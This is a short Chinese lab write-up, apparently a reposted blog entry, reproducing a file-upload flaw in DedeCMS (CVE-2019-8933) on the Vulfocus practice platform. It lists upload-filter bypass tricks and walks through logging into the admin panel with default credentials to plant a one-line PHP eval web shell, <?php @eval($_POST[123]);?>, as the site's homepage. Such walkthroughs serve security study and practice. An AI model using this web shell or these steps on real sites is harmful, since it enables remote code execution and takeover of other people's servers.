【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:


一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:48527

123.58.224.8:49857

 123.58.224.8:49857

1.2、知识:

1、基操

明目张胆的改后缀

(一般情况下,希望执行,需要考虑很多绕过方法)

大小写、空格、"."、::$DATA、双写、%00

前端JS检测、文件拓展名绕过、.htaccess文件绕过、条件竞争、内容加密、文件头检测、widows系统文件命名规则的特殊利用 、解析漏洞、 .user.ini.绕过

1.3、描述:

单纯的文件上传



二、漏洞验证

2.1、分析:

进入到登陆页面

URL后面加上/uploads/dede/

账号密码 admin/admin

模板----->默认模板管理----->新建模板

在内容中输入后门代码

<?php @eval($_POST[123]);?>

生成----->更新主页HTML----->浏览

选择新建的模板

后缀改为php

选择生成静态

点击更新主页HTML

 点击浏览

没有报错

所以后门地址为:

http://ip:port/uploads/index.php

使用后门工具进行连接

 

2.4、解题:

猜你喜欢

转载自blog.csdn.net/qq_53079406/article/details/127348900